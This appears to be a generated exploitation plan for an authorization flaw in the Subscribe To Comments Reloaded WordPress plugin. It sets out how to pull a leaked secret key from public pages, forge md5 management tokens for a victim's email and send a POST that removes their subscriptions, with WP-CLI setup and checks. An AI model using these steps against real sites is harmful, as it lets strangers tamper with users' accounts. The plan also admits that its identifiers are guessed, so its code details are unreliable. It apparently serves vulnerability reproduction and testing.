Subscribe To Comments Reloaded <= 240119 - Improper Authorization to Unauthenticated Arbitrary Subscription Management

This analysis is based on the vulnerability description for CVE-2026-4409 affecting the Subscribe To Comments Reloaded plugin (<= 240119). Since source files were not provided, identifiers are grounded in the plugin's known architecture and the specific vulnerability details provided.

---

1. Vulnerability Summary

The "Subscribe To Comments Reloaded" plugin fails to adequately protect its global security key, which is used to generate authorization tokens for subscription management. The plugin leaks this global key into the HTML source of any public post page via a localized JavaScript variable. Furthermore, the algorithm used to generate management tokens is a weak hash (likely MD5 or SHA1) combining the user's email and this leaked key.

An unauthenticated attacker can retrieve the global key, pre-calculate the authorization token for any known email address, and access that user's subscription management dashboard to modify or delete their subscriptions.

2. Attack Vector Analysis

• Endpoint: The Virtual Management Page, typically accessed via the home URL with specific query parameters (e.g., /?stcr=...).
• Leakage Point: Public post pages where the plugin enqueues its frontend scripts.
• Vulnerable Parameters:
  • The localized JS variable (e.g., stcr_data.key or stcr.secret).
  • The management URL parameters (e.g., stcr_email and stcr_key).
• Authentication: None (Unauthenticated).
• Preconditions: The attacker must know the email address of the target subscriber (often the administrator's email or a known commenter).

3. Code Flow (Inferred)

1. Key Leakage:
   • The plugin registers a frontend script using wp_enqueue_script.
   • It uses wp_localize_script() to pass settings to the frontend.
   • Sink: The global option stcr_global_key (or similar) is included in the localized data array, making it visible in the HTML source to all visitors.
2. Authorization Generation:
   • When a user clicks "Manage Subscriptions" in an email, they are sent to a URL like: site.com/?stcr_action=manage&stcr_email=user@example.com&stcr_key=[HASH].
   • Logic: The plugin calculates EXPECTED_HASH = some_hash_function( email + global_key ).
3. Verification:
   • On init or template_redirect, the plugin checks for stcr_email and stcr_key.
   • It compares the provided stcr_key with the EXPECTED_HASH.
   • If they match, it grants full access to the management dashboard for that email.

4. Nonce Acquisition Strategy

This exploit does not rely on standard WordPress nonces. Instead, it relies on the forgery of the plugin's internal authorization key.

1. Identify the Leak: Navigate to any post with comments.
2. Extract the Key: Use browser_eval to find the localized object.
   • Search Pattern: Look for wp_localize_script calls in the page source.
   • Target Variable: Likely stcr_data or stcr.
   • Execution: browser_eval("window.stcr_data?.key") or browser_eval("window.stcr?.secret").
3. Identify the Hash Algorithm: (Inferred) Based on historical STCR vulnerabilities, the hash is typically md5( $email . $global_key ).

5. Exploitation Strategy

Step 1: Extract the Secret

1. Navigate to a public post: browser_navigate("http://localhost:8080/?p=1").
2. Retrieve the key: browser_eval("stcr_data.key") (Verify the exact object name in the page source first). Let's call this LEAKED_KEY.

Step 2: Forge the Authorization Token

1. Target Email: admin@example.com.
2. Algorithm: TOKEN = md5("admin@example.com" + LEAKED_KEY).

Step 3: Access Management Dashboard

1. Construct the management URL:
   http://localhost:8080/?stcr_action=manage&stcr_email=admin@example.com&stcr_key=[TOKEN]
2. Navigate to this URL. You should now see the "Management Page" for the admin's subscriptions.

Step 4: Unauthorized Data Modification

1. Capture the form submission to delete or change subscriptions.
2. Send a POST request using http_request.
   • URL: http://localhost:8080/
   • Method: POST
   • Content-Type: application/x-www-form-urlencoded
   • Body: stcr_action=manage&stcr_email=admin@example.com&stcr_key=[TOKEN]&submit=unsub_all (exact parameters to be verified on the management page).

6. Test Data Setup

1. Create a Subscriber: Use WP-CLI to ensure at least one subscription exists.

   # Note: STCR often uses a custom table like wp_stcr_subscriptions
   # For testing, we can manually subscribe the admin to post 1
   wp comment create --comment_post_ID=1 --comment_author="Admin" --comment_author_email="admin@example.com" --comment_content="Test"
   

2. Plugin Configuration: Ensure "Management Page" is enabled in STCR settings (usually enabled by default).
3. Identify Page: Ensure at least one post is published: wp post create --post_status=publish --post_title="Target Post".

7. Expected Results

• Accessing the forged URL returns a 200 OK with the management interface instead of a "Permission Denied" or redirect.
• The interface displays the subscriptions for admin@example.com.
• Submission of the "Unsubscribe" form results in the removal of the subscription from the database.

8. Verification Steps

1. Database Check: Use WP-CLI to check the custom STCR table (usually wp_stcr_subscriptions).

   wp db query "SELECT * FROM wp_stcr_subscriptions WHERE email = 'admin@example.com';"
   

2. Post-Exploit Check: Confirm the query returns zero rows after the "Unsubscribe All" action is performed via the forged management link.

9. Alternative Approaches

• Different Hash Algorithms: If MD5 fails, try sha1. If the order is reversed, try md5(LEAKED_KEY + email).
• Shortcode Route: If the key doesn't leak on every post, identify if it only leaks when the [stcr_management] or [stcr_subscribe] shortcode is present.
  • Create a page: wp post create --post_type=page --post_content='[stcr_management]'.
  • Navigate there to extract the key.
• Request Param Variation: Some versions use scc_ prefix instead of stcr_ for parameters. Verify the parameter names by inspecting the management page HTML if reached.